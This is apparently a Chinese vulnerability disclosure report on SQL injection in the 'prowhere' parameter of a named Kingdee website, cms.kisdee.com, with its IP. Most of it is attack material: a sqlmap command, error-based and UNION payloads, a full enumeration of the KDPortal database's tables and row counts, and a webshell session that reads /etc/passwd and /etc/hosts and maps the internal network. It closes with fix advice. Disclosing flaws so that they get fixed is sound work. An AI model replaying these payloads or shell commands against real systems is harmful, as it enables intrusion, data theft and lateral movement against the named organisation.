### 简要描述: ... ### 详细说明: 金蝶 站点:cms.kisdee.com IP: 118.194.40.103 [<img src="https://images.seebug.org/upload/201504/27163842808c0ec04713f5937507b71875908cfd.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27163842808c0ec04713f5937507b71875908cfd.jpg) 漏洞点：`http://cms.kisdee.com/yp/product.php` 的 GET 参数 `prowhere` 未经过滤/参数化即拼入 MySQL 查询，存在 SQL 注入。用 sqlmap 验证：Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql 注入。sqlmap 确认了两种注入方式：基于报错的注入（MySQL >= 5.0 error-based，说明数据库错误信息被回显到页面）和 3 列的 UNION 查询注入；UNION 载荷先用 `)` 闭合，再接 `LIMIT 1,1 UNION ALL SELECT ...#`，说明该参数被拼接在括号内的条件表达式中，其后的原始语句由 `#` 注释掉。下面第二、三段输出中的 "a total of 0 HTTP(s) requests" 并不是新的探测，而是 sqlmap 从会话文件中恢复了已识别的注入点后继续执行 --dbs / --count 等操作。 ``` sqlmap identified the following injection points with a total of 23 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, 
CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- available databases [2]: [*] information_schema [*] KDPortal sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: prowhere=1) AND (SELECT 5495 FROM(SELECT COUNT(*),CONCAT(0x3a6d6f723a,(SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0 END)),0x3a7969753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2144=2144 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: prowhere=1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6d6f723a,0x79667a6853524b774958,0x3a7969753a)# Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, [QUERY]# --- Database: KDPortal +--------------------------------+---------+ | Table | Entries | +--------------------------------+---------+ | phpcms_member_group_priv | 807962 | | phpcms_log | 523885 | | zm_ip | 371671 | | ys_api_access | 370740 | | ys_feedback | 336509 | | phpcms_search | 124022 | | phpcms_content | 118638 | | phpcms_content_count | 116683 | | phpcms_c_news | 110427 | | phpcms_ads_stat | 106401 | | phpcms_admin_role_priv | 101413 | | phpcms_hits | 84484 | | ys_use_log | 66395 | | phpcms_content_tag | 53760 | | phpcms_attachment | 39544 | | phpcms_special_content | 27912 | | ys_opportunity | 26706 | | zhj_315_invite | 23781 | | kdcms_faqsearch | 12453 | | moweekly_wp_comments | 12393 | | phpcms_keyword | 11451 | | ys_ips | 10332 | | kdcms_hits | 8598 | | kdcms_manual | 7990 | | kdcms_manual_data | 7990 | | phpcms_menu | 7436 | | phpcms_c_policy | 7417 | | phpcms_category | 7351 | | kdcms_category | 7020 | | zm_user_credit | 6249 | | zhj_315_poll_log | 
5893 | | kdcms_log | 5851 | | kdcms_faq | 5646 | | kdcms_faq_data | 5646 | | zz_thewise_reg | 5556 | | zhj_315_user | 3531 | | kdcms_linkage | 3285 | | kdcms_search | 3130 | | phpcms_app_share | 2680 | | phpcms_content_position | 2408 | | kdcms_attachment | 2364 | | phpcms_comment | 2283 | | lsw_user_state | 2102 | | kdcms_attachment_index | 1982 | | phpcms_copyfrom | 1365 | | zhj_315_award | 1350 | | EM_USER | 1239 | | lsw_user | 1123 | | phpcms_author | 1103 | | kdcms_cache | 1097 | | phpcms_pay_exchange | 937 | | phpcms_special | 935 | | ms_info | 918 | | kdcms_admin_role_priv | 773 | | lsw_func | 660 | | ys_site | 657 | | kdcms_position_data | 620 | | ys_recycler | 617 | | EE_DIGG_LOG | 615 | | ee_order_list | 605 | | member | 585 | | EE_AWARD_LOG | 571 | | phpcms_model_field | 564 | | kdcms_model_field | 455 | | kdcms_category_priv | 449 | | phpcms_block | 427 | | fouryear_user | 399 | | ee_news_detail | 398 | | phpcms_c_app | 384 | | kdcms_menu | 334 | | moweekly_wp_term_relationships | 333 | | kdcms_comment_data_1 | 309 | | moweekly_wp_posts | 309 | | kdcms_operationcase | 300 | | kdcms_operationcase_data | 300 | | kdcms_ebook | 299 | | kdcms_ebook_data | 299 | | kdcms_news | 284 | | kdcms_news_data | 284 | | phpcms_admin_role | 271 | | kdcms_video | 245 | | kdcms_video_data | 245 | | phpcms_c_ent_case | 227 | | agiletour_bingo | 207 | | auction_log | 204 | | ys_coolsite | 204 | | kdcms_comment | 195 | | moweekly_wp_postmeta | 187 | | zz_search_log | 183 | | phpcms_app_suggest | 176 | | moweekly_wp_options | 150 | | phpcms_yp_stats | 146 | | phpcms_member | 139 | | phpcms_member_cache | 139 | | phpcms_member_info | 139 | | kdcms_case | 134 | | kdcms_case_data | 134 | | tmp_case829 | 127 | | fouryear_kill | 120 | | ys_bianma | 110 | | kis_collection | 108 | | cards | 106 | | phpcms_ads | 105 | | EE_MESSAGE | 99 | | phpcms_link | 99 | | phpcms_ads_place | 92 | | em_special | 87 | | answer | 77 | | ys_livesite | 76 | | kdcms_content_check | 73 | | kdcms_down | 
61 | | kdcms_down_data | 61 | | phpcms_c_ent_patch | 60 | | phpcms_app_category | 51 | | phpcms_type | 50 | | ee_product_comment | 49 | | moweekly_wp_usermeta | 48 | | ys_class | 48 | | ys_config | 48 | | auction_product | 47 | | phpcms_pay_stat | 47 | | phpcms_position | 47 | | kdcms_clientid | 43 | | kdcms_clientid_data | 43 | | phpcms_c_product | 42 | | kdcms_ep_define | 38 | | kdcms_ep_define_data | 38 | | phpcms_cache_count | 37 | | auction_orderlist | 34 | | phpcms_urlrule | 34 | | moweekly_wp_term_taxonomy | 28 | | ys_search | 28 | | moweekly_wp_terms | 27 | | kdcms_module | 25 | | phpcms_ask_actor | 25 | | phpcms_member_detail | 24 | | phpcms_model | 24 | | phpcms_module | 24 | | question | 23 | | phpcms_process_status | 21 | | kdcms_model | 20 | | phpcms_c_kis_product | 20 | | kdcms_type | 17 | | phpcms_c_ent_product | 15 | | phpcms_role | 14 | | ys_mingzhan | 14 | | kdcms_video_charge | 12 | | kdcms_video_charge_data | 12 | | ys_coolclass | 12 | | ys_index_common_use | 12 | | ys_index_hot_dowm | 12 | | ys_index_tool | 12 | | phpcms_c_ent_solution | 11 | | phpcms_space | 11 | | phpcms_vote_option | 11 | | ee_product | 10 | | kdcms_position | 10 | | kdcms_poster | 10 | | kdcms_poster_space | 10 | | kdcms_urlrule | 9 | | kdcms_yf_product | 9 | | kdcms_yf_product_data | 9 | | phpcms_status | 9 | | moweekly_wp_links | 8 | | ys_searchclass | 8 | | kdcms_admin_role | 7 | | kdcms_member_group | 7 | | phpcms_c_alliance_case | 7 | | phpcms_c_event | 7 | | phpcms_c_zhj_customer | 7 | | phpcms_editor_data | 7 | | phpcms_member_group | 7 | | kdcms_download | 6 | | kdcms_download_data | 6 | | kdcms_workflow | 6 | | phpcms_process | 6 | | phpcms_search_type | 6 | | em_class_info | 5 | | kdcms_admin_panel | 5 | | kdcms_site | 5 | | kdcms_sso_settings | 5 | | moweekly_wp_users | 5 | | phpcms_app_industry | 5 | | phpcms_player | 5 | | em_product_class | 4 | | fouryear_product | 4 | | kdcms_template_bak | 4 | | phpcms_spider_job | 4 | | ys_liveclass | 4 | | kdcms_admin | 3 
| | kdcms_member_menu | 3 | | phpcms_workflow | 3 | | ys_admin_user | 3 | | kdcms_announce | 2 | | kdcms_link | 2 | | phpcms_admin | 2 | | phpcms_area | 2 | | phpcms_datasource | 2 | | phpcms_pay_pointcard_type | 2 | | phpcms_space_api | 2 | | phpcms_spider_sites | 2 | | phpcms_times | 2 | | kdcms_application | 1 | | kdcms_application_data | 1 | | kdcms_comment_setting | 1 | | kdcms_comment_table | 1 | | kdcms_picture | 1 | | kdcms_picture_data | 1 | | kdcms_session | 1 | | kdcms_sso_admin | 1 | | kdcms_sso_applications | 1 | | kdcms_videodemo | 1 | | kdcms_videodemo_data | 1 | | kdcms_wap | 1 | | phpcms_keylink | 1 | | phpcms_mood | 1 | | phpcms_mood_data | 1 | | phpcms_session | 1 | | phpcms_vote_subject | 1 | | zm_admin_info | 1 | | zz_thewise | 1 | +--------------------------------+---------+ ``` 上面是对 KDPortal 库的整库枚举（表名及行数），说明该注入点对整个门户数据库具有读权限。其中含有多张管理员/凭据相关表（phpcms_admin、kdcms_admin、kdcms_sso_admin、ys_admin_user、zm_admin_info）和大量用户表（member 585 行、phpcms_member 139 行、lsw_user 1123 行、zhj_315_user 3531 行、EM_USER 1239 行、fouryear_user 399 行、moweekly_wp_users 5 行），phpcms_log、zm_ip、ys_feedback 等日志类表的行数更达数十万，数据泄露面很大。下面是在该 Web 服务器上取得的交互式 shell（主机名 debian-604-clean，提示符括号内的 daemon 应为当前执行用户，起始目录 /usr/local/ysstore/deploy/apache_portal/cms）。正文未展示取得 shell 的具体途径（仅见截图），无法据此判断它是由同一注入点（例如写文件）还是其他缺陷导致。 ``` [Linux debian-604-clean 2.6.32-5-amd64 #1 SMP Sat Mar 31 04:00:05 UTC 2012 x86_64(daemon)] /usr/local/ysstore/deploy/apache_portal/cms>cd / />ls -al total 400 drwxr-xr-x 22 root root 4096 May 17 2012 . drwxr-xr-x 22 root root 4096 May 17 2012 .. 
drwxr-xr-x 2 root root 4096 Oct 8 2014 bin drwxr-xr-x 3 root root 4096 Apr 27 2012 boot drwxr-xr-x 13 root root 2980 Feb 4 16:25 dev drwxr-xr-x 68 root root 4096 Feb 4 16:25 etc drwxr-xr-x 2 root root 4096 May 31 2012 home lrwxrwxrwx 1 root root 30 Apr 27 2012 initrd.img -> boot/initrd.img-2.6.32-5-amd64 drwxr-xr-x 11 root root 12288 Apr 28 2012 lib drwxr-xr-x 2 root root 12288 Apr 27 2012 lib32 lrwxrwxrwx 1 root root 4 Apr 27 2012 lib64 -> /lib drwx------ 2 root root 16384 Apr 27 2012 lost+found drwxr-xr-x 4 root root 4096 Apr 27 2012 media drwxr-xr-x 2 root root 4096 Jan 13 2012 mnt drwxr-xr-x 2 root root 4096 Apr 27 2012 opt dr-xr-xr-x 151 root root 0 Feb 4 16:25 proc drwx------ 7 root root 4096 Dec 31 10:44 root drwxr-xr-x 2 root root 4096 Apr 27 2012 sbin drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux drwxr-xr-x 2 root root 4096 Apr 27 2012 srv drwxr-xr-x 13 root root 0 Feb 4 16:25 sys drwxrwxrwt 2 root root 303104 Apr 27 15:51 tmp drwxr-xr-x 13 root root 4096 May 17 2012 usr drwxr-xr-x 13 root root 4096 Apr 27 2012 var lrwxrwxrwx 1 root root 27 Apr 27 2012 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64 />ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:bf:00:35 inet addr:192.168.223.136 Bcast:192.168.223.255 Mask:255.255.255.0 inet6 addr: fe80::250:56ff:febf:35/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:230310969 errors:0 dropped:0 overruns:0 frame:0 TX packets:309544330 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:62579541022 (58.2 GiB) TX bytes:308678048964 (287.4 GiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:7651048 errors:0 dropped:0 overruns:0 frame:0 TX packets:7651048 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:751215062 (716.4 MiB) TX bytes:751215062 (716.4 MiB) lo:157 Link encap:Local Loopback inet addr:192.168.223.157 Mask:255.255.255.255 UP LOOPBACK RUNNING 
MTU:16436 Metric:1 />arp -a ? (192.168.223.133) at 00:50:56:bf:00:3b [ether] on eth0 ? (192.168.223.129) at 00:50:56:bf:00:00 [ether] on eth0 ? (192.168.223.1) at 5c:dd:70:2b:c0:77 [ether] on eth0 ? (192.168.223.130) at 00:50:56:bf:00:2b [ether] on eth0 />cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin nagios:x:1001:1001::/home/nagios:/bin/bash />cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 debian-604-clean.kingdee.gbl debian-604-clean 192.168.223.147 api.cmcloud.cn # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters />cat /etc/issue Debian GNU/Linux 6.0 \n \l ``` 上述 shell 会话还暴露了内网信息：主机位于 192.168.223.0/24 网段（eth0 为 192.168.223.136，另有回环别名 192.168.223.157），/etc/hosts 中写明内部域 kingdee.gbl 及内部服务 api.cmcloud.cn（192.168.223.147），arp 表中可见四台相邻主机，这些都是进一步横向移动的入口；/etc/passwd 中除 root 外还有一个带 bash 登录的 nagios 账号。系统为 Debian GNU/Linux 6.0，内核 2.6.32-5-amd64（2012 年构建），早已停止安全更新。修复建议：product.php 对 prowhere 参数改用预编译语句绑定参数；若该参数本身就是用来拼接 WHERE 片段，则应改为白名单映射而不是直接拼接；为站点数据库账号做最小权限限制，并关闭页面上的 MySQL 错误信息回显以消除报错注入通道；排查并清除服务器上的 webshell，升级或下线该 Debian 6 主机。 [<img src="https://images.seebug.org/upload/201504/27164000fea905ea1e5f49ac9d49bcc55ef18a35.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27164000fea905ea1e5f49ac9d49bcc55ef18a35.jpg) ### 漏洞证明: ···